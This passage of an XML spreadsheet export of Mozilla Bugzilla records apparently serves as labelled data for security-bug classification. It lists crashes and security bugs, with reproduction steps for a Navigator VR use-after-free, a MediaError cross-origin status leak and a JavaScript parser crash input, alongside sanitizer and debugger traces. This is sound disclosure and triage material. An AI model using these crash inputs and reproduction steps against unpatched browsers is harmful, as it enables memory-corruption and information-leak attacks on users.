    #51 0x7ffb4bbb7bc5 in mozilla::TaskController::DoExecuteNextTaskOnlyMainThreadInternal(class mozilla::detail::BaseAutoLock&lt;class mozilla::Mutex &amp;&gt; const &amp;) /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:876
    #52 0x7ffb4bbb3315 in mozilla::TaskController::ExecuteNextTaskOnlyMainThreadInternal(class mozilla::detail::BaseAutoLock&lt;class mozilla::Mutex &amp;&gt; const &amp;) /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:699
    #53 0x7ffb4bbb3f64 in mozilla::TaskController::ProcessPendingMTTask(bool) /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:485
    #54 0x7ffb4bbd9661 in mozilla::TaskController::TaskController::&lt;lambda_5&gt;::operator() /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:211
    #55 0x7ffb4bbd9661 in mozilla::detail::RunnableFunction&lt;`lambda at /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:211:7'&gt;::Run /builds/worker/checkouts/gecko/xpcom/threads/nsThreadUtils.h:548
    #56 0x7ffb4bc096d5 in nsThread::ProcessNextEvent(bool, bool *) /builds/worker/checkouts/gecko/xpcom/threads/nsThread.cpp:1198
    #57 0x7ffb4bc1a59a in NS_ProcessNextEvent(class nsIThread *, bool) /builds/worker/checkouts/gecko/xpcom/threads/nsThreadUtils.cpp:480
    #58 0x7ffb4d30e117 in mozilla::ipc::MessagePump::Run(class base::MessagePump::Delegate *) /builds/worker/checkouts/gecko/ipc/glue/MessagePump.cpp:85
    #59 0x7ffb4d22b3e3 in MessageLoop::RunInternal /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:370
    #60 0x7ffb4d22b3e3 in MessageLoop::RunHandler(void) /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:363
    #61 0x7ffb4d22b1aa in MessageLoop::Run(void) /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:345
    #62 0x7ffb5596097c in nsBaseAppShell::Run(void) /builds/worker/checkouts/gecko/widget/nsBaseAppShell.cpp:148
    #63 0x7ffb55b83527 in nsAppShell::Run(void) /builds/worker/checkouts/gecko/widget/windows/nsAppShell.cpp:824
    #64 0x7ffb5a4dd9de in XRE_RunAppShell(void) /builds/worker/checkouts/gecko/toolkit/xre/nsEmbedFunctions.cpp:721
    #65 0x7ffb4d22b3e3 in MessageLoop::RunInternal /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:370
    #66 0x7ffb4d22b3e3 in MessageLoop::RunHandler(void) /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:363
    #67 0x7ffb4d22b1aa in MessageLoop::Run(void) /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:345
    #68 0x7ffb5a4dcfc4 in XRE_InitChildProcess(int, char **const, struct XREChildData const *) /builds/worker/checkouts/gecko/toolkit/xre/nsEmbedFunctions.cpp:656
    #69 0x7ff760ce2713 in content_process_main /builds/worker/checkouts/gecko/browser/app/../../ipc/contentproc/plugin-container.cpp:57
    #70 0x7ff760ce2713 in NS_internal_main(int, char **, char **) /builds/worker/checkouts/gecko/browser/app/nsBrowserApp.cpp:375
    #71 0x7ff760ce14d8 in wmain /builds/worker/checkouts/gecko/toolkit/xre/nsWindowsWMain.cpp:151
    #72 0x7ff760dc4337 in invoke_main D:\a\_work\1\s\src\vctools\crt\vcstartup\src\startup\exe_common.inl:90
    #73 0x7ff760dc4337 in __scrt_common_main_seh D:\a\_work\1\s\src\vctools\crt\vcstartup\src\startup\exe_common.inl:288
    #74 0x7ffc13287613  (C:\WINDOWS\System32\KERNEL32.DLL+0x180017613)
    #75 0x7ffc134a26b0  (C:\WINDOWS\SYSTEM32\ntdll.dll+0x1800526b0)
Address 0x2d73e07df008 is a wild pointer inside of access range of size 0x000000000008.
SUMMARY: AddressSanitizer: use-after-poison /builds/worker/workspace/obj-build/dist/include/js/HeapAPI.h:525 in js::gc::detail::GetTenuredGCThingZone
Shadow bytes around the buggy address:
  0x2d73e07ded80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x2d73e07dee00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x2d73e07dee80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x2d73e07def00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x2d73e07def80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=&gt;0x2d73e07df000: 00[f7]00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x2d73e07df080: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x2d73e07df100: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x2d73e07df180: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x2d73e07df200: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x2d73e07df280: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00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22712==ABORTING</t>
        </is>
      </c>
      <c r="X2845" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2846">
      <c r="A2846" t="n">
        <v>1270689</v>
      </c>
      <c r="B2846" t="inlineStr">
        <is>
          <t>2016-05-05 18:04:15 -0700</t>
        </is>
      </c>
      <c r="C2846" t="inlineStr">
        <is>
          <t>Widevine crash in non-virtual thunk to mozilla::WidevineDecryptor::OnSessionClosed when using DASH.js player</t>
        </is>
      </c>
      <c r="D2846" t="inlineStr">
        <is>
          <t>2016-07-12 00:48:46 -0700</t>
        </is>
      </c>
      <c r="E2846" t="n">
        <v>1</v>
      </c>
      <c r="F2846" t="n">
        <v>1</v>
      </c>
      <c r="G2846" t="n">
        <v>3</v>
      </c>
      <c r="H2846" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2846" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2846" t="inlineStr">
        <is>
          <t>Audio/Video: Playback</t>
        </is>
      </c>
      <c r="K2846" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2846" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2846" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N2846" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2846" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2846" t="inlineStr"/>
      <c r="Q2846" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2846" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2846" t="inlineStr">
        <is>
          <t>mozilla49</t>
        </is>
      </c>
      <c r="T2846" t="n">
        <v>1</v>
      </c>
      <c r="U2846" t="n">
        <v>0</v>
      </c>
      <c r="V2846" t="n">
        <v>28</v>
      </c>
      <c r="W2846" t="inlineStr">
        <is>
          <t>This bug was filed from the Socorro interface and is 
report bp-dcc4aefa-c837-490a-b026-aadbc2160505.
=============================================================
STR from bug 1268694:
1. Load http://dashif.org/reference/players/javascript/v2.1.1/samples/dash-if-reference-player/index.html
2. Load manifest http://html5.cablelabs.com:8100/cenc/wv/dash.mpd (also accessible from the DASH player's menu: Sample Streams &gt; CableLabs Test Content &gt; CableLabs Cenc Widevine) on DASH.js player menu.
3. Quickly hit the "Load" button 2–3 more times. If the crash happens, it always seems to happen within the first 1–2 button clicks when you first play the video after the browser starts.
0 	XUL 	non-virtual thunk to mozilla::WidevineDecryptor::OnSessionClosed(char const*, unsigned int) 	dom/media/gmp/widevine-adapter/WidevineDecryptor.cpp:396
Ø 1 	libwidevinecdm.dylib 	libwidevinecdm.dylib@0x4f88 	
Ø 2 	libwidevinecdm.dylib 	libwidevinecdm.dylib@0x1bddf 	
Ø 3 	libwidevinecdm.dylib 	libwidevinecdm.dylib@0x2615e 	
Ø 4 	libwidevinecdm.dylib 	libwidevinecdm.dylib@0x18677 	
Ø 5 	libwidevinecdm.dylib 	libwidevinecdm.dylib@0x1bf50 	
6 	XUL 	mozilla::gmp::GMPRunnable::Run() 	dom/media/gmp/GMPPlatform.cpp:40
7 	XUL 	RunnableMethod&lt;mozilla::gmp::GMPRunnable, void (mozilla::gmp::GMPRunnable::*)(), mozilla::Tuple&lt;&gt; &gt;::Run 	ipc/chromium/src/base/task.h:28
8 	XUL 	MessageLoop::DoWork() 	ipc/chromium/src/base/message_loop.cc:335
9 	XUL 	base::MessagePumpDefault::Run(base::MessagePump::Delegate*) 	ipc/chromium/src/base/message_pump_default.cc:34
10 	XUL 	MessageLoop::Run() 	ipc/chromium/src/base/message_loop.cc:233
11 	XUL 	XRE_InitChildProcess 	toolkit/xre/nsEmbedFunctions.cpp:637
12 	plugin-container 	content_process_main(int, char**) 	ipc/contentproc/plugin-container.cpp:237
13 	plugin-container 	start</t>
        </is>
      </c>
      <c r="X2846" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2847">
      <c r="A2847" t="n">
        <v>1315543</v>
      </c>
      <c r="B2847" t="inlineStr">
        <is>
          <t>2016-11-06 08:47:15 -0800</t>
        </is>
      </c>
      <c r="C2847" t="inlineStr">
        <is>
          <t>dom::Navigator::NotifyVRDisplaysUpdated  UAF</t>
        </is>
      </c>
      <c r="D2847" t="inlineStr">
        <is>
          <t>2024-05-30 09:22:51 -0700</t>
        </is>
      </c>
      <c r="E2847" t="n">
        <v>1</v>
      </c>
      <c r="F2847" t="n">
        <v>1</v>
      </c>
      <c r="G2847" t="n">
        <v>3</v>
      </c>
      <c r="H2847" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2847" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2847" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K2847" t="inlineStr">
        <is>
          <t>52 Branch</t>
        </is>
      </c>
      <c r="L2847" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2847" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2847" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2847" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2847" t="inlineStr">
        <is>
          <t>[adv-main50.1+]</t>
        </is>
      </c>
      <c r="Q2847" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2847" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2847" t="inlineStr">
        <is>
          <t>mozilla53</t>
        </is>
      </c>
      <c r="T2847" t="n">
        <v>1</v>
      </c>
      <c r="U2847" t="n">
        <v>0</v>
      </c>
      <c r="V2847" t="n">
        <v>36</v>
      </c>
      <c r="W2847" t="inlineStr">
        <is>
          <t>Created attachment 8807970
report.txt
User Agent: Mozilla/5.0 (X11; Linux x86_64; rv:43.0) Gecko/20100101 Firefox/43.0 SeaMonkey/2.40
Build ID: 20160314222922
Steps to reproduce:
Saved an xml file containing only "&lt;svg&gt;&lt;/svg&gt;" to external.xml in the directory root together with the attached html, this external file is loaded inside the attached html with a object tag, the node containing it's own window reference by issuing a call to navigator.getVRDisplays followed by the tag removal causes the usage of the freed navigator.
Tested with a Nightly build 32bit version:
Name      Firefox
Version 	52.0a1
Build ID 	20161007030207
A more detailed windbg output is attached aswell.
Actual results:
(bf8.d60): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=e5e5e5d5 ebx=00000000 ecx=e5e5e5d5 edx=1506d5b4 esi=142eb2c8 edi=17c081f0
eip=687f9216 esp=003aecc8 ebp=003aecd4 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00210202
xul!nsGlobalWindow::UpdateVRDisplays+0x8:
687f9216 80795e00        cmp     byte ptr [ecx+5Eh],0       ds:002b:e5e5e633=??</t>
        </is>
      </c>
      <c r="X2847" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2848">
      <c r="A2848" t="n">
        <v>899923</v>
      </c>
      <c r="B2848" t="inlineStr">
        <is>
          <t>2013-07-31 00:37:31 -0700</t>
        </is>
      </c>
      <c r="C2848" t="inlineStr">
        <is>
          <t>Test failure "Addons have been found - got 'false'" in /testAddons/testSearchAddons.js</t>
        </is>
      </c>
      <c r="D2848" t="inlineStr">
        <is>
          <t>2019-07-03 12:10:43 -0700</t>
        </is>
      </c>
      <c r="E2848" t="n">
        <v>1</v>
      </c>
      <c r="F2848" t="n">
        <v>1</v>
      </c>
      <c r="G2848" t="n">
        <v>6</v>
      </c>
      <c r="H2848" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I2848" t="inlineStr">
        <is>
          <t>Mozilla QA Graveyard</t>
        </is>
      </c>
      <c r="J2848" t="inlineStr">
        <is>
          <t>Mozmill Tests</t>
        </is>
      </c>
      <c r="K2848" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2848" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2848" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2848" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2848" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2848" t="inlineStr">
        <is>
          <t>[mozmill-test-failure][mozmill-remote]</t>
        </is>
      </c>
      <c r="Q2848" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2848" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2848" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2848" t="n">
        <v>1</v>
      </c>
      <c r="U2848" t="n">
        <v>0</v>
      </c>
      <c r="V2848" t="n">
        <v>16</v>
      </c>
      <c r="W2848" t="inlineStr">
        <is>
          <t>Test:      testSearchAddons    
Failure:   Addons have been found - got 'false'
Branches:  23
Platforms: OSX
We have 1 failure on Beta (23), en-US on OSX:
http://mozmill-release.blargon7.com/#/remote/report/b3aefd29a5c41bda1cc43616d3aecacb</t>
        </is>
      </c>
      <c r="X2848" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2849">
      <c r="A2849" t="n">
        <v>1434194</v>
      </c>
      <c r="B2849" t="inlineStr">
        <is>
          <t>2018-01-29 23:54:27 -0800</t>
        </is>
      </c>
      <c r="C2849" t="inlineStr">
        <is>
          <t>Private content shown in background when opening tabs tray in normal browsing</t>
        </is>
      </c>
      <c r="D2849" t="inlineStr">
        <is>
          <t>2018-03-09 05:03:29 -0800</t>
        </is>
      </c>
      <c r="E2849" t="n">
        <v>1</v>
      </c>
      <c r="F2849" t="n">
        <v>1</v>
      </c>
      <c r="G2849" t="n">
        <v>2</v>
      </c>
      <c r="H2849" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I2849" t="inlineStr">
        <is>
          <t>Firefox for iOS</t>
        </is>
      </c>
      <c r="J2849" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K2849" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2849" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="M2849" t="inlineStr">
        <is>
          <t>iOS</t>
        </is>
      </c>
      <c r="N2849" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2849" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2849" t="inlineStr"/>
      <c r="Q2849" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2849" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2849" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2849" t="n">
        <v>1</v>
      </c>
      <c r="U2849" t="n">
        <v>0</v>
      </c>
      <c r="V2849" t="n">
        <v>4</v>
      </c>
      <c r="W2849" t="inlineStr">
        <is>
          <t>Created attachment 8946563
private tab in background.mov
iPhone 8 Plus (11.2)
Firefox 11.0 beta 8821
1. Go to Firefox settings and enable the "Close Private Tabs when leaving private browsing" option.  
2. Switch to private browsing and visit Facebook in a new private tab.
3. Switch to normal browsing and visit a page in a new normal tab. 
4. Tap on the "tab counter" button to open tabs tray.
Result: The content of the private tab visited at step 2 is briefly shown in background when opening tabs tray.</t>
        </is>
      </c>
      <c r="X2849" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2850">
      <c r="A2850" t="n">
        <v>293347</v>
      </c>
      <c r="B2850" t="inlineStr">
        <is>
          <t>2005-05-08 04:56:38 -0700</t>
        </is>
      </c>
      <c r="C2850" t="inlineStr">
        <is>
          <t>XSLT with document.write crashes [@ nsScrollPortView::~nsScrollPortView]</t>
        </is>
      </c>
      <c r="D2850" t="inlineStr">
        <is>
          <t>2014-04-26 03:07:59 -0700</t>
        </is>
      </c>
      <c r="E2850" t="n">
        <v>1</v>
      </c>
      <c r="F2850" t="n">
        <v>1</v>
      </c>
      <c r="G2850" t="n">
        <v>3</v>
      </c>
      <c r="H2850" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2850" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2850" t="inlineStr">
        <is>
          <t>XSLT</t>
        </is>
      </c>
      <c r="K2850" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2850" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2850" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2850" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2850" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2850" t="inlineStr">
        <is>
          <t>[sg:critical?]</t>
        </is>
      </c>
      <c r="Q2850" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R2850" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2850" t="inlineStr">
        <is>
          <t>mozilla1.9.2</t>
        </is>
      </c>
      <c r="T2850" t="n">
        <v>1</v>
      </c>
      <c r="U2850" t="n">
        <v>1</v>
      </c>
      <c r="V2850" t="n">
        <v>41</v>
      </c>
      <c r="W2850" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.7.7) Gecko/20050414 Firefox/1.0.3
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.7.7) Gecko/20050414 Firefox/1.0.3
Openins this site with my firefox, it crashes automatically.
Reproducible: Always</t>
        </is>
      </c>
      <c r="X2850" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2851">
      <c r="A2851" t="n">
        <v>1450853</v>
      </c>
      <c r="B2851" t="inlineStr">
        <is>
          <t>2018-04-02 21:11:18 -0700</t>
        </is>
      </c>
      <c r="C2851" t="inlineStr">
        <is>
          <t>MediaError message property leaks cross-origin response status</t>
        </is>
      </c>
      <c r="D2851" t="inlineStr">
        <is>
          <t>2024-05-30 09:44:35 -0700</t>
        </is>
      </c>
      <c r="E2851" t="n">
        <v>1</v>
      </c>
      <c r="F2851" t="n">
        <v>1</v>
      </c>
      <c r="G2851" t="n">
        <v>3</v>
      </c>
      <c r="H2851" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2851" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2851" t="inlineStr">
        <is>
          <t>DOM: Security</t>
        </is>
      </c>
      <c r="K2851" t="inlineStr">
        <is>
          <t>58 Branch</t>
        </is>
      </c>
      <c r="L2851" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2851" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2851" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2851" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2851" t="inlineStr">
        <is>
          <t>[domsecurity-backlog2][adv-main80+]</t>
        </is>
      </c>
      <c r="Q2851" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R2851" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2851" t="inlineStr">
        <is>
          <t>mozilla80</t>
        </is>
      </c>
      <c r="T2851" t="n">
        <v>1</v>
      </c>
      <c r="U2851" t="n">
        <v>0</v>
      </c>
      <c r="V2851" t="n">
        <v>20</v>
      </c>
      <c r="W2851" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:58.0) Gecko/20100101 Firefox/58.0
Build ID: 20180208173149
Steps to reproduce:
1- Visit: https://output.jsbin.com/nejatopusi
2- Enter a URL in the input box, click the "Test" button
The URL will be loaded as the `src` of an audio element.
Actual results:
The message property of the MediaError interface contains a different string for resources that loads successfully. This allows an attacker to infer the response status for a cross-origin resource.
Expected results:
Cross-origin response status should not be detectable by scripts unless necessary CORS headers are sent by the server.</t>
        </is>
      </c>
      <c r="X2851" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2852">
      <c r="A2852" t="n">
        <v>1127012</v>
      </c>
      <c r="B2852" t="inlineStr">
        <is>
          <t>2015-01-28 12:58:52 -0800</t>
        </is>
      </c>
      <c r="C2852" t="inlineStr">
        <is>
          <t>Assertion failure: pn_type &lt; PNK_LIMIT, at ParseNode.h:494</t>
        </is>
      </c>
      <c r="D2852" t="inlineStr">
        <is>
          <t>2016-07-02 10:34:31 -0700</t>
        </is>
      </c>
      <c r="E2852" t="n">
        <v>1</v>
      </c>
      <c r="F2852" t="n">
        <v>1</v>
      </c>
      <c r="G2852" t="n">
        <v>3</v>
      </c>
      <c r="H2852" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2852" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2852" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K2852" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2852" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2852" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2852" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2852" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2852" t="inlineStr">
        <is>
          <t>[adv-main37+]</t>
        </is>
      </c>
      <c r="Q2852" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2852" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2852" t="inlineStr">
        <is>
          <t>mozilla39</t>
        </is>
      </c>
      <c r="T2852" t="n">
        <v>1</v>
      </c>
      <c r="U2852" t="n">
        <v>0</v>
      </c>
      <c r="V2852" t="n">
        <v>27</v>
      </c>
      <c r="W2852" t="inlineStr">
        <is>
          <t>Assertion failure: pn_type &lt; PNK_LIMIT, at ParseNode.h:494
js&gt; for (var {[ function(){} ]: {}}=1 in x) {}
Process 6585 stopped
* thread #1: tid = 0x7d8fe, 0x000000010092bbf8 js`js::frontend::ParseNode::getKind(this=0x0000000000000000) const + 24 at ParseNode.h:494, queue = 'com.apple.main-thread', stop reason = EXC_BAD_ACCESS (code=1, address=0x0)
    frame #0: 0x000000010092bbf8 js`js::frontend::ParseNode::getKind(this=0x0000000000000000) const + 24 at ParseNode.h:494
   491 	    bool isOp(JSOp op) const               { return getOp() == op; }
   492 	
   493 	    ParseNodeKind getKind() const {
-&gt; 494 	        MOZ_ASSERT(pn_type &lt; PNK_LIMIT);
   495 	        return ParseNodeKind(pn_type);
   496 	    }
   497 	    void setKind(ParseNodeKind kind) {
(lldb) bt
* thread #1: tid = 0x7d8fe, 0x000000010092bbf8 js`js::frontend::ParseNode::getKind(this=0x0000000000000000) const + 24 at ParseNode.h:494, queue = 'com.apple.main-thread', stop reason = EXC_BAD_ACCESS (code=1, address=0x0)
  * frame #0: 0x000000010092bbf8 js`js::frontend::ParseNode::getKind(this=0x0000000000000000) const + 24 at ParseNode.h:494
    frame #1: 0x0000000100263073 js`js::frontend::Parser&lt;js::frontend::FullParseHandler&gt;::cloneParseTree(this=0x00007fff5fbfe320, opn=0x0000000000000000) + 115 at ParseNode.cpp:322
    frame #2: 0x000000010026323a js`js::frontend::Parser&lt;js::frontend::FullParseHandler&gt;::cloneParseTree(this=0x00007fff5fbfe320, opn=0x0000000103592090) + 570 at ParseNode.cpp:337
    frame #3: 0x00000001002635f0 js`js::frontend::Parser&lt;js::frontend::FullParseHandler&gt;::cloneParseTree(this=0x00007fff5fbfe320, opn=0x0000000103592138) + 1520 at ParseNode.cpp:382
    frame #4: 0x0000000100263c69 js`js::frontend::Parser&lt;js::frontend::FullParseHandler&gt;::cloneLeftHandSide(this=0x00007fff5fbfe320, opn=0x0000000103592058) + 921 at ParseNode.cpp:483
    frame #5: 0x000000010009c8b9 js`js::frontend::Parser&lt;js::frontend::FullParseHandler&gt;::forStatement(this=0x00007fff5fbfe320) + 3561 at Parser.cpp:4824
    frame #6: 0x00000001000ae86b js`js::frontend::Parser&lt;js::frontend::FullParseHandler&gt;::statement(this=0x00007fff5fbfe320, canHaveDirectives=true) + 683 at Parser.cpp:5837
    frame #7: 0x0000000100246b44 js`js::frontend::CompileScript(cx=0x0000000103581180, alloc=0x0000000103532230, scopeChain=JS::HandleObject at 0x00007fff5fbfdc68, evalCaller=JS::HandleScript at 0x00007fff5fbfdc60, evalStaticScope=Handle&lt;js::StaticEvalObject *&gt; at 0x00007fff5fbfdc58, options=0x00007fff5fbff268, srcBuf=0x00007fff5fbfefd8, source_=0x0000000000000000, staticLevel=0, extraSct=0x0000000000000000) + 4692 at BytecodeCompiler.cpp:346
    frame #8: 0x0000000100712282 js`JS::Compile(cx=0x0000000103581180, obj=JS::HandleObject at 0x00007fff5fbfef88, options=0x00007fff5fbff268, srcBuf=0x00007fff5fbfefd8, script=JS::MutableHandleScript at 0x00007fff5fbfef80) + 450 at jsapi.cpp:3898
    frame #9: 0x0000000100712356 js`JS::Compile(cx=0x0000000103581180, obj=JS::HandleObject at 0x00007fff5fbff018, options=0x00007fff5fbff268, chars=0x00000001035082e0, length=41, script=JS::MutableHandleScript at 0x00007fff5fbff010) + 102 at jsapi.cpp:3908
    frame #10: 0x00000001007124ff js`JS::Compile(cx=0x0000000103581180, obj=JS::HandleObject at 0x00007fff5fbff120, options=0x00007fff5fbff268, bytes=0x00000001054fdbc0, length=41, script=JS::MutableHandleScript at 0x00007fff5fbff118) + 383 at jsapi.cpp:3923
    frame #11: 0x000000010000a5da js`EvalAndPrint(cx=0x0000000103581180, global=Handle&lt;JSObject *&gt; at 0x00007fff5fbff350, bytes=0x00000001054fdbc0, length=41, lineno=1, compileOnly=false, out=0x00007fff763cb408) + 330 at js.cpp:474
    frame #12: 0x0000000100009f69 js`ReadEvalPrintLoop(cx=0x0000000103581180, global=Handle&lt;JSObject *&gt; at 0x00007fff5fbff440, in=0x00007fff763cb370, out=0x00007fff763cb408, compileOnly=false) + 793 at js.cpp:542
    frame #13: 0x000000010000982d js`Process(cx=0x0000000103581180, obj_=0x000000010535a060, filename=0x0000000000000000, forceTTY=true) + 493 at js.cpp:589
    frame #14: 0x0000000100008e98 js`ProcessArgs(cx=0x0000000103581180, obj_=0x000000010535a060, op=0x00007fff5fbff958) + 376 at js.cpp:5488
    frame #15: 0x000000010000475f js`Shell(cx=0x0000000103581180, op=0x00007fff5fbff958, envp=0x00007fff5fbffaa0) + 447 at js.cpp:5755
    frame #16: 0x00000001000020c9 js`main(argc=1, argv=0x00007fff5fbffa90, envp=0x00007fff5fbffaa0) + 4201 at js.cpp:6096
    frame #17: 0x0000000100000da4 js`start + 52
Similar bug happens with default value in destructuring (bug 1125658, bug 1126518, bug 1126555).
I guess many cases (PN_CODE, PN_NULLARY for RegExp, PN_TERNARY for if/for in comprehension) in cloneParseTree were not used until computed property was implemented (bug 924688), and now they're also used by default value in destructuring (bug 932080).
We should have test cases for it.
e.g.
  for (var {[ [for (x of y) x] ]: {}}=1 in x) {}
  for (var {[ /x/ ]: {}}=1 in x) {}
Not sure the impact of this bug, so marking this as security.</t>
        </is>
      </c>
      <c r="X2852" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2853">
      <c r="A2853" t="n">
        <v>643649</v>
      </c>
      <c r="B2853" t="inlineStr">
        <is>
          <t>2011-03-21 17:35:55 -0700</t>
        </is>
      </c>
      <c r="C2853" t="inlineStr">
        <is>
          <t>Incorrect length passed to RegEnumValueW for value name buffer size in gfxGDIFontList::GetFontSubstitutes</t>
        </is>
      </c>
      <c r="D2853" t="inlineStr">
        <is>
          <t>2011-05-24 23:34:37 -0700</t>
        </is>
      </c>
      <c r="E2853" t="n">
        <v>1</v>
      </c>
      <c r="F2853" t="n">
        <v>1</v>
      </c>
      <c r="G2853" t="n">
        <v>3</v>
      </c>
      <c r="H2853" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2853" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2853" t="inlineStr">
        <is>
